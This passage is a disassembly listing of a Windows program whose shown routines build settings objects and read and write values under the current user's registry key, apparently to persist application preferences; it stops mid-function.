lea ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_18]
add ecx, 10h
call sub_431648
mov ecx, [ebp+var_18]
call sub_426CC3
mov edx, [ebp+var_18]
mov [ebp+var_14], edx
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_0]
call sub_431642
mov eax, [ebp+var_14]
loc_426E48: ; CODE XREF: sub_426DB8+5F�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 4
sub_426DB8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4324A9
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 24h
mov [ebp-30h], ecx
mov ecx, [ebp-30h]
call sub_4281D0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-30h]
add ecx, 10h
call sub_4283A0
mov ecx, [ebp-30h]
add ecx, 20h
call sub_4283A0
push 0
push 0
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_428320
mov ecx, [ebp-30h]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
push 0
push 0
push 0
push 0
lea ecx, [ebp-2Ch]
call sub_428320
mov ecx, [ebp-30h]
add ecx, 20h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
push offset dword_439CC4
mov ecx, [ebp-30h]
add ecx, 8
call sub_43163C
mov ecx, [ebp-30h]
mov dword ptr [ecx], 80000001h
mov edx, [ebp-30h]
mov dword ptr [edx+30h], 0
mov eax, [ebp-30h]
mov dword ptr [eax+34h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-30h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4324D7
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 3Ch
push esi
mov [ebp-38h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-38h]
call sub_4281D0
mov byte ptr [ebp-4], 1
mov ecx, [ebp-38h]
add ecx, 10h
call sub_4283A0
mov ecx, [ebp-38h]
add ecx, 20h
call sub_4283A0
push 0
push 0
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_428320
mov ecx, [ebp-38h]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov ecx, [ebp-38h]
add ecx, 20h
mov edx, [ebp+0Ch]
mov [ecx], edx
mov eax, [ebp+10h]
mov [ecx+4], eax
mov edx, [ebp+14h]
mov [ecx+8], edx
mov eax, [ebp+18h]
mov [ecx+0Ch], eax
mov ecx, [ebp-38h]
mov edx, [ebp+1Ch]
mov [ecx+34h], edx
mov eax, [ebp-38h]
mov ecx, [ebp+20h]
mov [eax], ecx
mov edx, [ebp-38h]
mov dword ptr [edx+30h], 0
push offset asc_437554 ; "\\"
lea ecx, [ebp+8]
call sub_431696
push 5Ch
lea ecx, [ebp+8]
call sub_431666
push eax
lea eax, [ebp-20h]
push eax
lea ecx, [ebp+8]
call sub_431660
mov [ebp-3Ch], eax
mov ecx, [ebp-3Ch]
mov [ebp-40h], ecx
mov byte ptr [ebp-4], 2
mov edx, [ebp-40h]
push edx
mov ecx, [ebp-38h]
add ecx, 0Ch
call sub_431648
mov byte ptr [ebp-4], 1
lea ecx, [ebp-20h]
call sub_431642
push offset asc_437558 ; "\\"
mov ecx, [ebp-38h]
add ecx, 0Ch
call sub_431690
lea ecx, [ebp+8]
call sub_428280
mov esi, eax
push 5Ch
lea ecx, [ebp+8]
call sub_431666
sub esi, eax
push esi
lea eax, [ebp-24h]
push eax
lea ecx, [ebp+8]
call sub_43168A
mov [ebp-44h], eax
mov ecx, [ebp-44h]
mov [ebp-48h], ecx
mov byte ptr [ebp-4], 3
mov edx, [ebp-48h]
push edx
mov ecx, [ebp-38h]
add ecx, 8
call sub_431648
mov byte ptr [ebp-4], 1
lea ecx, [ebp-24h]
call sub_431642
push offset asc_43755C ; "\\"
mov ecx, [ebp-38h]
add ecx, 8
call sub_431696
push offset asc_437560 ; "\\"
mov ecx, [ebp-38h]
add ecx, 8
call sub_431690
lea eax, [ebp-34h]
push eax
mov ecx, [ebp-38h]
call sub_4270ED
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov eax, [ebp-38h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 1Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_428230
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4270ED proc near ; CODE XREF: HLXc:004270B2�p
; HLXc:00427342�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
mov [ebp+var_2C], ecx
mov eax, [ebp+var_2C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_2C]
add ecx, 0Ch
call sub_4226A0
push eax
mov ecx, [ebp+var_2C]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz loc_427248
mov [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push 0
lea ecx, [ebp+var_C]
push ecx
push 0
mov ecx, [ebp+var_2C]
add ecx, 8
call sub_4226A0
push eax
mov edx, [ebp+var_2C]
mov eax, [edx+4]
push eax
call dword_433010 ; RegQueryValueExA
mov ecx, [ebp+var_8]
push ecx
call sub_431624
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_4], edx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
push 0
mov ecx, [ebp+var_2C]
add ecx, 8
call sub_4226A0
push eax
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz short loc_427205
mov edx, [ebp+var_4]
push edx
lea ecx, [ebp+var_20]
call sub_428360
mov ecx, [ebp+var_2C]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov ecx, [ebp+var_4]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
push edx
call sub_43161E
add esp, 4
mov eax, [ebp+var_2C]
mov dword ptr [eax+30h], 1
mov ecx, [ebp+var_2C]
mov edx, [ecx+4]
push edx
call dword_433000 ; RegCloseKey
mov eax, [ebp+var_2C]
add eax, 10h
mov ecx, [ebp+arg_0]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
jmp short loc_42726A
; ---------------------------------------------------------------------------
loc_427205: ; CODE XREF: sub_4270ED+A1�j
mov ecx, [ebp+var_4]
mov [ebp+var_28], ecx
mov edx, [ebp+var_28]
push edx
call sub_43161E
add esp, 4
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_2C]
add edx, 20h
mov eax, [ebp+arg_0]
mov ecx, [edx]
mov [eax], ecx
mov ecx, [edx+4]
mov [eax+4], ecx
mov ecx, [edx+8]
mov [eax+8], ecx
mov edx, [edx+0Ch]
mov [eax+0Ch], edx
mov eax, [ebp+arg_0]
jmp short loc_42726A
; ---------------------------------------------------------------------------
loc_427248: ; CODE XREF: sub_4270ED+31�j
mov eax, [ebp+var_2C]
add eax, 20h
mov ecx, [ebp+arg_0]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
loc_42726A: ; CODE XREF: sub_4270ED+116�j
; sub_4270ED+159�j
mov esp, ebp
pop ebp
retn 4
sub_4270ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427270 proc near ; CODE XREF: HLXc:004273B1�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CC8
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_4272B2
jmp short loc_4272F8
; ---------------------------------------------------------------------------
loc_4272B2: ; CODE XREF: sub_427270+3E�j
push 10h
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_4283A0
push eax
push 3
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4226A0
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_4272EB
mov eax, [ebp+var_8]
mov dword ptr [eax+30h], 1
loc_4272EB: ; CODE XREF: sub_427270+6F�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_433000 ; RegCloseKey
loc_4272F8: ; CODE XREF: sub_427270+40�j
mov esp, ebp
pop ebp
retn
sub_427270 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp-14h], ecx
mov eax, [ebp-14h]
cmp dword ptr [eax+30h], 0
jz short loc_42733B
mov ecx, [ebp-14h]
cmp dword ptr [ecx+34h], 0
jnz short loc_42733B
mov edx, [ebp-14h]
add edx, 10h
mov eax, [ebp+8]
mov ecx, [edx]
mov [eax], ecx
mov ecx, [edx+4]
mov [eax+4], ecx
mov ecx, [edx+8]
mov [eax+8], ecx
mov edx, [edx+0Ch]
mov [eax+0Ch], edx
mov eax, [ebp+8]
jmp short loc_427363
; ---------------------------------------------------------------------------
loc_42733B: ; CODE XREF: HLXc:0042730C�j
; HLXc:00427315�j
lea eax, [ebp-10h]
push eax
mov ecx, [ebp-14h]
call sub_4270ED
mov ecx, [ebp+8]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+8]
loc_427363: ; CODE XREF: HLXc:00427339�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 10h
push eax
lea ecx, [ebp+8]
call sub_428380
test eax, eax
jz short loc_427391
mov ecx, [ebp-4]
cmp dword ptr [ecx+34h], 0
jnz short loc_427391
mov eax, [ebp-4]
jmp short loc_4273B9
; ---------------------------------------------------------------------------
loc_427391: ; CODE XREF: HLXc:00427381�j
; HLXc:0042738A�j
mov edx, [ebp-4]
add edx, 10h
mov eax, [ebp+8]
mov [edx], eax
mov ecx, [ebp+0Ch]
mov [edx+4], ecx
mov eax, [ebp+10h]
mov [edx+8], eax
mov ecx, [ebp+14h]
mov [edx+0Ch], ecx
mov ecx, [ebp-4]
call sub_427270
mov eax, [ebp-4]
loc_4273B9: ; CODE XREF: HLXc:0042738F�j
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4324EA
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
mov [ebp-20h], ecx
mov ecx, [ebp-20h]
call sub_4281D0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-20h]
add ecx, 10h
call sub_4283A0
mov ecx, [ebp-20h]
add ecx, 18h
call sub_4283A0
push 0
push 0
lea ecx, [ebp-14h]
call sub_4283B0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-20h]
mov [eax+10h], ecx
mov [eax+14h], edx
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_4283B0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-20h]
mov [eax+18h], ecx
mov [eax+1Ch], edx
push offset dword_439CCC
mov ecx, [ebp-20h]
add ecx, 8
call sub_43163C
mov ecx, [ebp-20h]
mov dword ptr [ecx], 80000001h
mov edx, [ebp-20h]
mov dword ptr [edx+20h], 0
mov eax, [ebp-20h]
mov dword ptr [eax+24h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-20h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_432518
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push esi
mov [ebp-28h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-28h]
call sub_4281D0
mov byte ptr [ebp-4], 1
mov ecx, [ebp-28h]
add ecx, 10h
call sub_4283A0
mov ecx, [ebp-28h]
add ecx, 18h
call sub_4283A0
push 0
push 0
lea ecx, [ebp-14h]
call sub_4283B0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-28h]
mov [eax+10h], ecx
mov [eax+14h], edx
mov ecx, [ebp-28h]
mov edx, [ebp+0Ch]
mov [ecx+18h], edx
mov eax, [ebp+10h]
mov [ecx+1Ch], eax
mov ecx, [ebp-28h]
mov edx, [ebp+14h]
mov [ecx+24h], edx
mov eax, [ebp-28h]
mov ecx, [ebp+18h]
mov [eax], ecx
mov edx, [ebp-28h]
mov dword ptr [edx+20h], 0
push offset asc_437564 ; "\\"
lea ecx, [ebp+8]
call sub_431696
push 5Ch
lea ecx, [ebp+8]
call sub_431666
push eax
lea eax, [ebp-18h]
push eax
lea ecx, [ebp+8]
call sub_431660
mov [ebp-2Ch], eax
mov ecx, [ebp-2Ch]
mov [ebp-30h], ecx
mov byte ptr [ebp-4], 2
mov edx, [ebp-30h]
push edx
mov ecx, [ebp-28h]
add ecx, 0Ch
call sub_431648
mov byte ptr [ebp-4], 1
lea ecx, [ebp-18h]
call sub_431642
push offset asc_437568 ; "\\"
mov ecx, [ebp-28h]
add ecx, 0Ch
call sub_431690
lea ecx, [ebp+8]
call sub_428280
mov esi, eax
push 5Ch
lea ecx, [ebp+8]
call sub_431666
sub esi, eax
push esi
lea eax, [ebp-1Ch]
push eax
lea ecx, [ebp+8]
call sub_43168A
mov [ebp-34h], eax
mov ecx, [ebp-34h]
mov [ebp-38h], ecx
mov byte ptr [ebp-4], 3
mov edx, [ebp-38h]
push edx
mov ecx, [ebp-28h]
add ecx, 8
call sub_431648
mov byte ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_431642
push offset asc_43756C ; "\\"
mov ecx, [ebp-28h]
add ecx, 8
call sub_431696
push offset asc_437570 ; "\\"
mov ecx, [ebp-28h]
add ecx, 8
call sub_431690
lea eax, [ebp-24h]
push eax
mov ecx, [ebp-28h]
call sub_427610
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_431642
mov eax, [ebp-28h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_428230
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427610 proc near ; CODE XREF: HLXc:004275D5�p
; HLXc:00427820�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov [ebp+var_24], ecx
mov eax, [ebp+var_24]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_24]
add ecx, 0Ch
call sub_4226A0
push eax
mov ecx, [ebp+var_24]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz loc_427747
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 0
lea ecx, [ebp+var_8]
push ecx
push 0
mov ecx, [ebp+var_24]
add ecx, 8
call sub_4226A0
push eax
mov edx, [ebp+var_24]
mov eax, [edx+4]
push eax
call dword_433010 ; RegQueryValueExA
mov ecx, [ebp+var_4]
push ecx
call sub_431624
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_24]
add ecx, 8
call sub_4226A0
push eax
mov eax, [ebp+var_24]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz short loc_427712
mov edx, [ebp+var_C]
mov eax, [edx+4]
push eax
mov ecx, [edx]
push ecx
lea ecx, [ebp+var_18]
call sub_4283E0
mov edx, [eax]
mov eax, [eax+4]
mov ecx, [ebp+var_24]
mov [ecx+10h], edx
mov [ecx+14h], eax
mov edx, [ebp+var_C]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
push eax
call sub_43161E
add esp, 4
mov ecx, [ebp+var_24]
mov dword ptr [ecx+20h], 1
mov edx, [ebp+var_24]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
mov ecx, [ebp+var_24]
mov edx, [ecx+10h]
mov eax, [ecx+14h]
mov ecx, [ebp+arg_0]
mov [ecx], edx
mov [ecx+4], eax
mov eax, [ebp+arg_0]
jmp short loc_42775B
; ---------------------------------------------------------------------------
loc_427712: ; CODE XREF: sub_427610+A1�j
mov edx, [ebp+var_C]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_43161E
add esp, 4
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
push edx
call dword_433000 ; RegCloseKey
mov eax, [ebp+var_24]
mov ecx, [eax+18h]
mov edx, [eax+1Ch]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov [eax+4], edx
mov eax, [ebp+arg_0]
jmp short loc_42775B
; ---------------------------------------------------------------------------
loc_427747: ; CODE XREF: sub_427610+31�j
mov ecx, [ebp+var_24]
mov edx, [ecx+18h]
mov eax, [ecx+1Ch]
mov ecx, [ebp+arg_0]
mov [ecx], edx
mov [ecx+4], eax
mov eax, [ebp+arg_0]
loc_42775B: ; CODE XREF: sub_427610+100�j
; sub_427610+135�j
mov esp, ebp
pop ebp
retn 4
sub_427610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427761 proc near ; CODE XREF: HLXc:00427887�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_439CD0
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_43300C ; RegCreateKeyExA
test eax, eax
jz short loc_4277A3
jmp short loc_4277E4
; ---------------------------------------------------------------------------
loc_4277A3: ; CODE XREF: sub_427761+3E�j
push 8
mov ecx, [ebp+var_8]
add ecx, 10h
push ecx
push 3
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4226A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_433008 ; RegSetValueExA
test eax, eax
jnz short loc_4277D7
mov ecx, [ebp+var_8]
mov dword ptr [ecx+20h], 1
loc_4277D7: ; CODE XREF: sub_427761+6A�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_433000 ; RegCloseKey
loc_4277E4: ; CODE XREF: sub_427761+40�j
mov esp, ebp
pop ebp
retn
sub_427761 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp-0Ch]
cmp dword ptr [eax+20h], 0
jz short loc_427819
mov ecx, [ebp-0Ch]
cmp dword ptr [ecx+24h], 0
jnz short loc_427819
mov edx, [ebp-0Ch]
mov eax, [edx+10h]
mov ecx, [edx+14h]
mov edx, [ebp+8]
mov [edx], eax
mov [edx+4], ecx
mov eax, [ebp+8]
jmp short loc_427835
; ---------------------------------------------------------------------------
loc_427819: ; CODE XREF: HLXc:004277F8�j
; HLXc:00427801�j
lea eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
call sub_427610
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp+8]
mov [eax], ecx
mov [eax+4], edx
mov eax, [ebp+8]
loc_427835: ; CODE XREF: HLXc:00427817�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp-0Ch]
mov ecx, [eax+10h]
mov edx, [eax+14h]
mov [ebp-8], ecx
mov [ebp-4], edx
mov eax, [ebp-4]
push eax
mov ecx, [ebp-8]
push ecx
lea ecx, [ebp+8]
call sub_428400
test eax, eax
jz short loc_427875
mov edx, [ebp-0Ch]
cmp dword ptr [edx+24h], 0
jnz short loc_427875
mov eax, [ebp-0Ch]
jmp short loc_42788F
; ---------------------------------------------------------------------------
loc_427875: ; CODE XREF: HLXc:00427865�j
; HLXc:0042786E�j
mov eax, [ebp-0Ch]
mov ecx, [ebp+8]
mov [eax+10h], ecx
mov edx, [ebp+0Ch]
mov [eax+14h], edx
mov ecx, [ebp-0Ch]
call sub_427761
mov eax, [ebp-0Ch]
loc_42788F: ; CODE XREF: HLXc:00427873�j
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_432545
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp-18h], ecx
mov ecx, [ebp-18h]
call sub_428440
mov dword ptr [ebp-4], 0
lea eax, [ebp-10h]
push eax
mov ecx, [ebp-18h]
add ecx, 28h
call dword_43316C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-14h]
push ecx
mov ecx, [ebp-18h]
add ecx, 38h
call dword_43316C
mov byte ptr [ebp-4], 2
push offset dword_439CD4
mov ecx, [ebp-18h]
add ecx, 28h
call dword_433194
push offset dword_439CD8
mov ecx, [ebp-18h]
add ecx, 38h
call dword_433194
push offset dword_439CDC
mov ecx, [ebp-18h]
add ecx, 8
call dword_433194
mov edx, [ebp-18h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-18h]
mov dword ptr [eax+48h], 0
mov ecx, [ebp-18h]
mov dword ptr [ecx+4Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-18h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_43259A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 50h
mov [ebp-4Ch], ecx
mov dword ptr [ebp-4], 1
mov ecx, [ebp-4Ch]
call sub_428440
mov byte ptr [ebp-4], 2
lea eax, [ebp-14h]
push eax
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_43316C
mov byte ptr [ebp-4], 3
lea ecx, [ebp-18h]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_43316C
mov byte ptr [ebp-4], 4
push offset dword_439CE0
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_433194
lea edx, [ebp+18h]
push edx
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_43317C
mov eax, [ebp-4Ch]
mov ecx, [ebp+28h]
mov [eax+4Ch], ecx
mov edx, [ebp-4Ch]
mov eax, [ebp+2Ch]
mov [edx], eax
mov ecx, [ebp-4Ch]
mov dword ptr [ecx+48h], 0
mov edx, dword_433178
mov eax, [edx]
push eax
push 5Ch
lea ecx, [ebp+8]
call dword_433174
mov [ebp-10h], eax
mov ecx, [ebp-10h]
push ecx
push 0
lea edx, [ebp-28h]
push edx
lea ecx, [ebp+8]
call dword_433170
mov [ebp-50h], eax
mov eax, [ebp-50h]
mov [ebp-54h], eax
mov byte ptr [ebp-4], 5
mov ecx, [ebp-54h]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 18h
call dword_43317C
mov byte ptr [ebp-4], 4
lea ecx, [ebp-28h]
call dword_433168
mov edx, dword_433178
mov eax, [edx]
push eax
mov ecx, [ebp-10h]
add ecx, 1
push ecx
lea edx, [ebp-38h]
push edx
lea ecx, [ebp+8]
call dword_433170
mov [ebp-58h], eax
mov eax, [ebp-58h]
mov [ebp-5Ch], eax
mov byte ptr [ebp-4], 6
mov ecx, [ebp-5Ch]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 8
call dword_43317C
mov byte ptr [ebp-4], 4
lea ecx, [ebp-38h]
call dword_433168
lea edx, [ebp-48h]
push edx
mov ecx, [ebp-4Ch]
call sub_427B23
lea ecx, [ebp-48h]
call dword_433168
mov byte ptr [ebp-4], 0
lea ecx, [ebp+8]
call dword_433168
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+18h]
call dword_433168
mov eax, [ebp-4Ch]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 28h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4325BA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov dword ptr [ebp-4], 1
mov ecx, [ebp-10h]
add ecx, 38h
call dword_433168
mov byte ptr [ebp-4], 0
mov ecx, [ebp-10h]
add ecx, 28h
call dword_433168
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
call sub_4284A0
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427B23 proc near ; CODE XREF: HLXc:00427A89�p
; HLXc:00427D66�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov [ebp+var_1C], 0
mov eax, [ebp+var_20]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_20]
add ecx, 18h
call dword_433188
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx]
push edx
call dword_433004 ; RegOpenKeyExA
test eax, eax
jnz loc_427C62
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 0
lea ecx, [ebp+var_C]
push ecx
push 0
mov ecx, [ebp+var_20]
add ecx, 8
call dword_433188
push eax
mov edx, [ebp+var_20]
mov eax, [edx+4]
push eax
call dword_433010 ; RegQueryValueExA
mov ecx, [ebp+var_4]
push ecx
call sub_431624
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_8], edx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_C]
push edx
push 0
mov ecx, [ebp+var_20]
add ecx, 8
call dword_433188
push eax
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_433010 ; RegQueryValueExA
test eax, eax
jnz short loc_427C26
mov edx, [ebp+var_8]
push edx
mov ecx, [ebp+var_20]
add ecx, 28h
call dword_433184
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
push ecx
call sub_43161E
add esp, 4
mov edx, [ebp+var_20]
mov dword ptr [edx+48h], 1
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_20]
add edx, 28h
push edx
mov ecx, [ebp+arg_0]
call dword_433180
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
jmp short loc_427C7E
; ---------------------------------------------------------------------------
loc_427C26: ; CODE XREF: sub_427B23+AB�j
mov ecx, [ebp+var_8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
push edx
call sub_43161E
add esp, 4
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_433000 ; RegCloseKey
mov edx, [ebp+var_20]
add edx, 38h
push edx
mov ecx, [ebp+arg_0]
call dword_433180
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
jmp short loc_427C7E
; ---------------------------------------------------------------------------
loc_427C62: ; CODE XREF: sub_427B23+39�j
mov ecx, [ebp+var_20]
